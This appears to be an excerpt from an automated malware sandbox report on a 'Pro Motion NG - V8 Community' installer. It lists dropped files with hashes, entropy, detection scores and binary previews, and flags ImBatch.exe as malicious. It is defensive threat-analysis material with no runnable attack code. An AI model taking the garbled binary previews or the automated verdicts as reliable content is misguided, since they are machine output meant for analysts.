11:23:17	API Interceptor	17x Sleep call for process: ImBatch.exe modified

Created / dropped Files

C:\Config.Msi\3b2df8.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	2876
Entropy (8bit):	5.701164793174722
Encrypted:	false
SSDEEP:	48:stnJnh+M6Ba4YEPVLOGLnNG8UZZv9GqJodD8SZx3J:sNca4LtfLRZNJ
MD5:	3183D93A2446498C45EA35D191B785C3
SHA1:	1B0ECBF22812B4BD05A4436617FFEFE1B4F7BB13
SHA-256:	CBDFCE81080F8F14D6F4523B90BC5B4CD38585D0231F8D9954AF68B22C07EA5F
SHA-512:	E7C5C5633CDF10903CB30512B58C873DFBF16444CBF1AC02E176D1D35EFAA4EE2125EFB8C840386733FD63604FA272611456919E97AA690C64818B4E20DFAA2D
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@.Z/W.@.....@.....@.....@.....@.....@......&.{1CC170D0-5392-404D-A691-410183B16E39}..Pro Motion NG - V8 Community..promot_s.msi.@.....@.....@.....@........&.{712FA1FF-5EDD-4B8A-A341-2347CE5946D3}.....@.....@.....@.....@.......@.....@.....@.......@......Pro Motion NG - V8 Community......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{BACEFD7C-2242-4BDA-88CA-278EA0FBAC71}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{E1F4536E-7D2A-4F44-81EE-727B5F105E80}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{5D6E9285-4329-458E-B15D-3C8136F01048}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{C6DC23EE-92A9-49EA-992A-ABF476CB0AE8}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{AE823812-BB3F-493F-8F60-317E6B3E6A0A}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{6657E4F3-4680-42A4-B190-314796A15474}&.{1CC170D0-5392-404D-A691-410183B16E39}.@......&.{EABBFDD3-0CA6-42E4-B0B0-4AD2

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 63165 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	63165
Entropy (8bit):	7.996024649033599
Encrypted:	true
SSDEEP:	1536:RfhMeKBlsociYZAT+4oGNk2rb2oX3bUH+uOlEU:RhV0WXvAa4XNoeudU
MD5:	F3441B8572AAE8801C04F3060B550443
SHA1:	4EF0A35436125D6821831EF36C28FFAF196CDA15
SHA-256:	6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
SHA-512:	5BA01BA421B50030E380AE6BBCD2F681F2A91947FE7FEDB3C8E6B5F24DCE9517ABF57B1CF26CC6078D4BB53BDE6FCFB2561591337C841F8F2CB121A3D71661B9
Malicious:	false
Reputation:	low
Preview:	MSCF............,...................I.......\..........V. .authroot.stl....Pv5..CK..8U.......t.%.-d.\D.][d..%k.%;-"IZH.....M.KBC..E..DE...{o.t......9...}.....wA...edY.h.8..3...I7..`...r0..$..........M..Yd.a..We....H7.QvF.o..Y.Xpp.....\|..J.."...Ti.Z...A...N......{....T.K...'...!.xx....[....3..F.;..L.....]...F.)z\|...'....x..E...{..n.hz..m.<........8./..,.w!.He.H.\..j.n...E).r#.!.$.W...'.......N>.{#xm...ynyb$...?........C!P.....P...,A+...<A_.xf=.9W......p...O...aP4.A.......3Y.BG?.P.4Q0\|MD.3I....GH.1.h....p..(D..B.D.QVFfp......K.l..a.....9...5;d........b...T. ..C......v@..E...}.pL..",.B?z.......(.9.@V....!k.. ...\|\A;.....$.Z_y.Cp..;.dYrq.oP.;...._X@......YM?a\.A.......i....X,...bE.o.0.^.az.4.e$o.......Sm....ypM..uI.W..q..>}.....(.l\?0"A..RxJm.....3V....'.9..#.f?.m...6Z3....?.J..v.-.mjS..9.y7j.HuxR.._..{....1......&S5..T....I(....R..D=..n.X.c.!E....".Y..,.En....v...@....T'.A.....v.....fW.X....c...F./........3....T.g!..`..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.1221572889204423
Encrypted:	false
SSDEEP:	6:kKoL07N+SkQlPlEGYRMY9z+4KlDA3RUeoMmlb:wnkPlE99SNxAhUeor
MD5:	BE57F3ABB6D857BE0246AFD460472877
SHA1:	C9F4341152866FB83F7E8CCC2DEA6BDE82B41122
SHA-256:	CD0B9D4D0A258DDF8F85DA8C0B36F5F2F9285D98937E97A8AC025D5D9FE6BC2E
SHA-512:	5EA660EC3A13C74D711AB5D39E658BFC15547F4C83D458320D6C43759E67B12EFE18585CD388BE45E5CE2A25536401E77B1308C9EC00EF007002E4625CAE3701
Malicious:	false
Reputation:	low
Preview:	p...... .........?J;....(....................................................... ........?:.".......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.0.6.7.8.6.d.1.2.2.d.5.d.9.1.:.0."...

C:\Users\user\AppData\Local\HighMotionLog\{85D50C94-EF68-44C5-88E8-10362A632234}.txt

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.460773296617251
Encrypted:	false
SSDEEP:	3:Z/s26LLwuN9LPC5kVev:aR/zLPC+ev
MD5:	B3C99B5A88216DA77ACBF70FFFDB8A44
SHA1:	2DD76B222612D540E07D90433A6FBF38C8E06F62
SHA-256:	5B0E790D82DA9B7D060B9C800CC825E6107EBA0F9227AE9E2BD8420CE73CE4B6
SHA-512:	50AB92F71E19128F1E0E71232CBABB05ABCE2066BA921080AC92EF47D1D7AC94377C685C29EE715B511F09A9811D472C6C5CB4343283FB826AF2DF9ABCF79694
Malicious:	false
Reputation:	low
Preview:	00:00.000.Session start - ImBatch 7.6.0 en-GB - 1280x1024..

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ApiCore.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1422944
Entropy (8bit):	6.414765663788012
Encrypted:	false
SSDEEP:	24576:gy5FhaCKiB65YNk3X5gWvZDC9a3J4exTLY0mB1/b47qmBD8rbdgBcJkFbqnufE:gy5FhaCKrP7vZDCAtxTLY0mHAqmBD8a4
MD5:	327BC6C03376729B36FFDA1656A19DE4
SHA1:	40C2F3A2869C8F133A46C21B06F3481003A02D0C
SHA-256:	243E2113A47395F3C55335907C73F1D2C4ABAE5E785E01C4B17A22ADC972FA7A
SHA-512:	477E3B80E50E5A70426048D96404BE270329566AD005C7CC5426B430B2C8E6346FEB89C3AB9930BD007C3C50E285E6B7D64E5B9A8716F35E9D39B8A6549205D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...................................@....9Y.............................................................................................................................................................................................................................................................PE..L....X.e...........!...%.B..........o........`...............................P!...........@.....................................P....@!.................`..... ..f..P...8...............................@............`...............................text...lA.......B.................. ..`.rdata.......`.......F..............@..@.data........0..."..................@....rsrc......... ......0..............@..@.reloc...f.... ..h...2..............@..B.l2..........@!.....................@..@................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\DirectXTex.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	512512
Entropy (8bit):	5.132256533873661
Encrypted:	false
SSDEEP:	3072:0s2rxgixvPs3c9uVutc8Zex6M49V46SvK1YEG1IWB0UcWXteHKC2y2IQH12y7P22:o83cbTXG1v0P2MwWmK+7wEwmf5V
MD5:	E80B1F3DF3D25F1F288DD5A6CAE279D5
SHA1:	594F575FCBCFFE81DE9CD820418ADF1F577C2CD2
SHA-256:	CB6A5059A35E511A673DD5F5EBEDE54A5CA0369A87D2C247D95410DA8ADF647B
SHA-512:	F793335BF6A88834E0306417EBB9E405B5971E36650ADD6947D06A462A0C468EC78AF3EFB7901D66C0CBB80D4E63427122AAC5A5A8AC0E3DDCD07DE3F98471D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Y.h.Y.h.Y.h.<.k.R.h.<.m...h...i.[.h...l.V.h...k.L.h...m.~.h.<.l.@.h.<.i.\.h.Y.i...h...m.M.h...h.X.h.....X.h...j.X.h.RichY.h.........................PE..L.....U`...........!................=T....... ............................................@.....................................<...............................8%......T...............................@............ ...............................text............................... ..`.rdata...z... ...\|..................@..@.data...h$..........................@....rsrc...............................@..@.reloc..8%.......&..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7767096
Entropy (8bit):	7.990166089092734
Encrypted:	true
SSDEEP:	196608:fop/YlYi8dnDWIMXjP/TXrDNXO8ptfs1CytFVHzqs:fop4ZCWBXbrheItf8HZzqs
MD5:	13D6ED715E2ADD3C52A9E6A0C79649DE
SHA1:	CCA3F077B1318B0478D0C1976EC7E8EBFF007DCC
SHA-256:	EAB4F49165F7E5250E01131623F10FB763FC45918CA09EEEC2117941908D11F6
SHA-512:	E015F3BF79D3906DA78672E84F3B0DB414FA86262ECF2B9D7457FF0A209D83959460C58E0C1F3B7FD94C49831D34BD5B2BF0B1B0A2B06D462706D86FAFF112A1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZD...Z..&...%...r..".W&.=.&..u..w....I].M\0..;Z..Q.......Q..............................................................................................................................................................................................PE..L....Sd.........."......R...0...............p....@..................................v..........@........................... ..X....0..............p3v..P.................................................................................................................................`........@...........................@............@.............................`............. ......................@....rsrc........0....'.................@..@.....................,'.............@....................v....'.............@.............................................................................................................................................................................................B..i92N...Nx.~..0.......Kk.

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\Options\commands.cfg

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	Microsoft HTML Help Project
Category:	dropped
Size (bytes):	714
Entropy (8bit):	4.675299697976527
Encrypted:	false
SSDEEP:	12:9muwK/bPZp4nXUk1S+h+HsvSYRXathvVqyUzxE1HfwsSlj/L79aIre8JcAoka:9m7CZpu9S+h+Hsa0Wh9qyUmH4sYj/L7c
MD5:	87FE9526A2438820407285D064E9E1B9
SHA1:	2FE56DC6B948EBCF583883379DDB1CCE7B2C70C5
SHA-256:	C035F2B24A33B3137002B0ACA16A62838444B6D86F078836B12E24BE80018F13
SHA-512:	8D25EC1C07BF38F79838129B9DDDC8C138E5F03B2A729FFFC7039D9D570A524BBBB353B574DFFA45D6A1102BF7682E89ED096A3D2D2A302DE3E1E971E2381811
Malicious:	false
Reputation:	low
Preview:	[Options]..0=TIF..1=TIFF..2=FAX..3=G3N..4=G3F..5=XIF..6=GIF..7=JPG..8=JPEG..9=JPE..10=JIF..11=JFIF..12=PCX..13=BMP..14=DIB..15=RLE..16=ICO..17=CUR..18=PNG..19=DCM..20=DIC..21=DICOM..22=V2..23=WMF..24=EMF..25=TGA..26=TARGA..27=VDA..28=ICB..29=VST..30=PIX..31=PXM..32=PPM..33=PGM..34=PBM..35=WBMP..36=JP2..37=J2K..38=JPC..39=J2C..40=DCX..41=CRW..42=CR2..43=DNG..44=NEF..45=RAW..46=RAF..47=X3F..48=ORF..49=SRF..50=MRW..51=DCR..52=BAY..53=PEF..54=SR2..55=ARW..56=KDC..57=MEF..58=3FR..59=K25..60=ERF..61=CAM..62=CS1..63=DC2..64=DCS..65=FFF..66=MDC..67=MOS..68=NRW..69=PTX..70=PXN..71=RDC..72=RW2..73=RWL..74=IIQ..75=SRW..76=PSD..77=PSB..78=IEV..79=IEN..80=IMAGEEN..81=LYR..82=ALL..83=WDP..84=HDP..85=JXR..ExtsNum=86....

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\WinIMergeLib.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5151848
Entropy (8bit):	6.352812333012661
Encrypted:	false
SSDEEP:	49152:uL6ne1irETgzllmzy9Fz010bYExb1kDqTOB/dGRzjEUMK1:uLge4rETOleIYCb1Fgs8nK1
MD5:	B849CBCA88CAA77EF2D7ECAB086F0E47
SHA1:	94F49C425C01F643D24749EEB5D65EC6C62AC665
SHA-256:	EB01E798C7D6885AD61A8AB129427F46F6DC6A61B28A4A0631B47B583E308D61
SHA-512:	B6A9EFC3715A62B06B5B1E17A4158542BD2972EF44E7C1A3C0BFB53657F7B6CF06E7A7B31E122D26C81C3F050BDB40F2B2B7A16CDF354E9B5213ADA2BC5B81A9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........p..............K.K.....K.I.J...K.H.....a.}......y.......y.......y.......i).........$...Wx..}...Wx......WxE.......-.....Wx......Rich............PE..L.....Hc...........!........../...../.........................................N.......N...@...........................8.......8.......M..............tN.h(....M..... .7.T.....................7.....x.7.@...............,............................text...J........................... ....rdata..V...........................@..@.data.........8.......8.............@....rsrc.........M......`M.............@..@.reloc........M......nM.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\cddbU.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	844088
Entropy (8bit):	6.718690628925359
Encrypted:	false
SSDEEP:	24576:j/CvrUUq+vXKbQnhpEC1I1Ux94w73hn/g:9UvXZnh5x94w73h/g
MD5:	201B2F0FD51BFE1BA716521927908EF4
SHA1:	041797CA4D65F59C2E510BCA3ABC45E1AFC4014B
SHA-256:	7F428B2CE5AD8CD818890EF75E5F14EE891599FEA68EA594760E7D0E4E7F5782
SHA-512:	A6640BB30A7A73DD9E9182C5A9C6CC5F6B9C717F6C643BF9E44994FDC3B95681C3878EFB221708269D13D0CDB70511525AAB530E58966EF23257267978B369DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@............-.......+.t..................-......+......*.R.....+....../...../.V.....'...................,....Rich...........PE..L...m..e...........!...%.`...H......rB.......p............................................@.............................H.......d.......................85.......f..(...8...........................h...@............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data....p.......T..................@....rsrc................:..............@..@.reloc...f.......h...D..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\hams\database.wav

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	RIFF (little-endian) data, WAVE audio
Category:	dropped
Size (bytes):	1352930
Entropy (8bit):	6.588102099797551
Encrypted:	false
SSDEEP:	24576:cNnp+aSGOrC5YG+FyEnyqLE50V/oFRevF0IG4rjDMWHd:cL+2sC56FyE9LE50oRevxxXzd
MD5:	99D932C65B5E251989AA740BE63D5241
SHA1:	89202562412D0C25773C03EE22A07772849BA1CB
SHA-256:	9551FFC4967A77FEFAD8656ABBD624FC11F9B9C9C79E94868A18BA5B3A38C62B
SHA-512:	9E40812E39D446B4644DF8E5CF50F5174B5A8BF744639A65B8B4BF4F8A1CDE30149C7CEE39107AA02B22DAD5A240F5F2FCDFC7E79A8574C5C33FBC68AE6C7083
Malicious:	false
Reputation:	low
Preview:	RIFF...WAVEJUNK....reserved for RF64 ds64 chunkfmt (.......D...0...........?................8.qattn....:Z.Adata........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\jpeg62.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	737792
Entropy (8bit):	5.801875998435243
Encrypted:	false
SSDEEP:	12288:wD3iRr13XeNTLQlRiZkVSUvyThSkWPc6X:wbiTGQHiZkVSUp0
MD5:	523A9F8FB14845DACE902B1FDBF0CCB8
SHA1:	7594B43F60921B3AF6938F1FACB202F5AA8D0075
SHA-256:	C18CDF7A7B0055F3FCB43040A92022534D231E25DF601B490AB713F5D0EA0F48
SHA-512:	DB3011C1BC4244E1D1F6C2878A15ADCA3CFE00A369EF96D2E5E6B6FC39332CAC40B7A0D80C004BE8646A000F5EC43C972D10989E3F97E5A354277816FB20B655
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ...NT..NT..NT.;.T..NT.;.T<.NT.;.T..NT...T..NT..OT.NT..KU..NT..JU..NT..MU..NT..NT..NT..JU..NT..NU..NT..T..NT..LU..NTRich..NT........PE..L...q.z\...........!.........F.............. ............................................@.........................`...........(....P.......................`..t,......................................@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0......................@....rsrc........P......................@..@.reloc..t,...`......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\pspiHost.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	6.39771652028681
Encrypted:	false
SSDEEP:	3072:k2TGe4Dr+1r2+ePVlwf94mg39rm+mPb5PSWk/Dmru7P:k+Ge4Dr+1rtetCVI38k/DUu7P
MD5:	CBE0307F553A44A21A0A92FCF2392D85
SHA1:	3AF7763944A61DD99C6110C7973C6E54AAB7495C
SHA-256:	5FDEC741BB4EA7CC57ADA669129F5085E14B3A0015C1C638C6B3EBF03FF2E579
SHA-512:	4CE3258362173DF1D85E19D6ABD5586860154370243A28C586E104101669EC4694E42CC3A6062F06E6410D404030B41A95D0231F1D6AE8FB158DC80CC83938A3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .p.d...d...d.......o...............w...6...A...6...k...6...u.......a...d...........`.......e.......e.......e...Richd...........................PE..L.....a...........!......................................................................@.........................P...........<....P.......................`..........p...........................`...@...............x............................text...0........................... ..`.rdata..*...........................@..@.data...l....0......................@....rsrc........P......................@..@.reloc.......`....... ..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wPDFView03.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3032984
Entropy (8bit):	6.534273372870505
Encrypted:	false
SSDEEP:	49152:Et4ySr8QSdulASXLsA0L9pjtpWn8bbgHPEaTfTyrWhvGcv:EWlHsA0L9pxp9bgHQ6Gcv
MD5:	3914A25AA7880692ED03DDC1048CBDB1
SHA1:	E2FA0CE65085EF25EE4ED6E03A59B0192AFE29B2
SHA-256:	797B8E47D020CD7760D2DF3A6DD0019515C746BA42FE879CF1078F43878F5536
SHA-512:	6F7A77CA610C43E4769CC9A5CE4BC869E34AEBAB00F935950778CC41D08CD221F193BDB072DE381D96D11E07E1CCF2810F97FD4890EF37A66B2E54F0B8BB35FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....j.S..................'..\|........'.......'...@...........................2......./.................................B.... ..<}...P1.........................(....................................................3..H.......&....................text.....'.......'................. ..`.itext........'.......'............. ..`.data.........'.......'.............@....bss.....`....).......)..................idata..<}... ...~....).............@....didata.&..........................@....edata..B..........................@..@.reloc..(.............*.............@..B.rsrc........P1.......,.............@..@..............2.....................@..@................................................................................................

C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wp_type1ttf.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	745984
Entropy (8bit):	6.58419506541404
Encrypted:	false
SSDEEP:	12288:hvQoE1FDvl2eyb2lSwrnbqp6ChvaCd8I1Scf1VX5/yvNMTqCfuM12LgAN4/fdXB:7YvJlSwfW9aWAcft/MNMTf2Mwcj/1
MD5:	119A4963DD4BEAE7DBF4CF973F3D5ACA
SHA1:	C48B55BDDDE9C90CE41A3FF3A1AD7CADAF01701D
SHA-256:	ECD68FCB3131FDCC944F13C715BDF8DCDDBFFDF21C32C615A97B4EE8145D9BD3
SHA-512:	22161D38BEE86B8BC3F16FBB096893F0F11342A1312D3DFD970E6E18950AB9A0C84B021E2337D21737F98004C941A41621DB3B804866D677ECA9DF13023BF4BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:.H.T.H.T.H.T.S7..k.T.S7.Q.T.S7..5.T.A..K.T.H.U...T.S7..o.T.S7.I.T.S7.I.T.S7.I.T.RichH.T.................PE..L.....rN...........!................................................................$.....@.........................Po.......h..(................................9...................................c..@...............(............................text............................... ..`.rdata..!...........................@..@.data...X............p..............@....rsrc...............................@..@.reloc...@.......B... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7D3EA542ED1748BE9F8E7E2E62557D69.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	zlib compressed data
Category:	dropped
Size (bytes):	876998
Entropy (8bit):	7.998705025531365
Encrypted:	true
SSDEEP:	24576:eBDCw9Go+BETHenRMm9OLRVWJme8Chw7NBN6IYQ3Z+ewo5e:eBuwMiTkRb+4uxBAqMi5e
MD5:	4A2A3E4DC56F7A3D19376B90EABDEECF
SHA1:	CEC8FC37AB4F516B9B60DAE0FFFB01131B36A584
SHA-256:	E4757E8ECD75D95A744018B73EC52611575C4E83108DA55CC40C1A0725DAD794
SHA-512:	A2F12A0333F11396DE7C1E5030DB6A33E015EDF57F8CFA7D82CDA9121274B21200F1C1EC8D29C4E4C0C50DCC618D545748769A0BB10D0269B051094B36DD8582
Malicious:	false
Reputation:	low
Preview:	x..w ...?~.{.....[....2..$$."e$.DD....eff...".eg..~;..l.^....?......\.:.....`D.p......l96)H..1.y.q9...o}.A.c#H.._.I...."p........E...\|(.xE.c.[..o...}}......IN[[w].9.H.9....DTn......Y;2.PL....s..b..^R.....j._36Z..#D....l.]~q....b.[.[...!..R..~8..x...r.)..1.'&.S.z..J.@....T.w...%.H...KQ..W.3..Cp.c....RE....".3{?=;.$....r6.Y.....^..#7.....W.0..6X<.p"d....N..n..@.+.n/<!,I ..1....Z..B}....Q..u.~Q..nH=p6.(..7....Q.6...J#.NPH.G`..\..!.D..V..}......Xn.^...i.>.t.....m#.f...ljs.Q...I>b_j..(3=.A...n..'../8......t....B.4l.p.....W}5.L..<!...#HF..V.yr;.J..y.x....}..0.l.B...s.c&...".\5.M}7..5..B..R...`.m[....G.J}...qWo.d.....E.....1 5Bb6.../.....k0.X...S....^#.w.c}...lwyX?....'F....^.t.7N!.9....]2.....g$.BZ#.N.<.N:.ZB..>...d.g.5...d.T..be....xDDc....Y. ._.P.X?W.ve.;=5...F~&km.CyS.k'!....^...i8.V.....qC..o.PB...'.yOf...h4.2.=./.9.........).. 1Tb, .S[ vP..BC...b.Kd.]....7%...C1\\\|..iu0...<....'oQ6.6.k.(.....g9^}}).F......5{T.6.@.ed...&..*.......o>n

C:\Users\user\AppData\Local\Temp\988100C6E8D545D09E9088035937627A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	data
Category:	dropped
Size (bytes):	1674686
Entropy (8bit):	7.15391619901332
Encrypted:	false
SSDEEP:	49152:ANrfVsf5S4vu/KeHHdriu+YiL6gztNFnwSXwPFJys7K7VNDMbn+J1JWp8vXRro4v:mXWaYrnHyWJ
MD5:	98A08034EE621E9F7E3A5B4B39CFEB69
SHA1:	BD007EBFD5CAE96D54BF9090F1F885E85511D2D1
SHA-256:	20FF967C66127DC8671E2C10C4D33EE55AB0E386B763E101BEF841F792500097
SHA-512:	A7DE4375D7C9726E28AB0F7AE713366AFFAB658AC0A68891ED8AEE73BB67B01E7118E65B7DE264BB7AEB0FA7D1211E70323427E4C6A54276FA3B3E8EB5CCD911
Malicious:	false
Reputation:	low
Preview:	..............F.3.{x......p....................?<.....k..d..................+7....5{..................<.mm.h.\x.................wx.'mx......,.~..............Y....8....i..............q.l...I........................0...1............a.t.......n............`. (...............v[....n.8...........)x.O}a..n...........c.#.R............[L..H....+..........v`..h...OR].R...........Z7..............m..\|........aQ...........eiP#j...B..UOu,.7&.(..........-Z...xM...].Q.?.._................E............/7...D.................j..pV&W..B.F......T.ae.............O...9cC.mx.?..............m....L#..}.g68K^D..o..............._.9/K.2Lp.T.cG...........].....D..............eiP#j.....5e................D...\....D5............Q.c...'.5.........../N.A*..@............9'....-.6I..+...............t.w...........48o..E.d.c~"...]..................3!YM.................[.\|..J.]b..........fjz:`...-...........9X.e..iS;D..............b...1..[#a..j.............b...1_z..ko................tTY..P

C:\Users\user\AppData\Local\Temp\A3E96AA6001E40C6B03CF73333ED5DC6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	data
Category:	dropped
Size (bytes):	1674682
Entropy (8bit):	7.153915332788223
Encrypted:	false
SSDEEP:	49152:MNrfVsf5S4vu/KeHHdriu+YiL6gztNFnwSXwPFJys7K7VNDMbn+J1JWp8vXRro4v:iXWaYrnHyWJ
MD5:	6E3C1769A84FC72970758C8B8ED0EB14
SHA1:	089DC97FA3EB08880395A01D48A3F93A877495D1
SHA-256:	1A2D45BFDA53D360B6C96218915D5EF1F3A07B9FEC823E8862D07F52E288064C
SHA-512:	FA491707F4DC8E310B1C24DE2E29F39358D4BA207FFB06A9B4A32584F8E00EB70F97397DA11F518F0A4781ABFCB0942771A0395F293520809094E68A6EDD5B78
Malicious:	false
Reputation:	low
Preview:	..........F.3.{x......p....................?<.....k..d..................+7....5{..................<.mm.h.\x.................wx.'mx......,.~..............Y....8....i..............q.l...I........................0...1............a.t.......n............`. (...............v[....n.8...........)x.O}a..n...........c.#.R............[L..H....+..........v`..h...OR].R...........Z7..............m..\|........aQ...........eiP#j...B..UOu,.7&.(..........-Z...xM...].Q.?.._................E............/7...D.................j..pV&W..B.F......T.ae.............O...9cC.mx.?..............m....L#..}.g68K^D..o..............._.9/K.2Lp.T.cG...........].....D..............eiP#j.....5e................D...\....D5............Q.c...'.5.........../N.A*..@............9'....-.6I..+...............t.w...........48o..E.d.c~"...]..................3!YM.................[.\|..J.]b..........fjz:`...-...........9X.e..iS;D..............b...1..[#a..j.............b...1_z..ko................tTY..P....

C:\Users\user\AppData\Local\Temp\C4E6D975E5A1402FA70494B2534ED4B6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	zlib compressed data
Category:	dropped
Size (bytes):	920
Entropy (8bit):	7.737222510369589
Encrypted:	false
SSDEEP:	12:7sFEzmurjcCVAPau/920+315fByHgv3XvFwSPD+d5eEQWacfiswl8S366hWPJ:7sFEztrjcCVcV83dcorDEAoaNswiACJ
MD5:	26FDDA963A7BEF2D614156DA9A351898
SHA1:	7B94666DEB6F39B83E92E3698502513183B5D4F2
SHA-256:	50292C115EDD99864AD174ED73B239C7B072C1796F9B62EC740D372C3FB8F567
SHA-512:	E3AA6E914676CE489A432B28EC5AEF9B63B4BB55B9F8A39ABDE4CF9593FC0E620B82D43EF93536693CF6773670EE2AFE058BDDBD5A6DB036DB859C723DD15B30
Malicious:	false
Reputation:	low
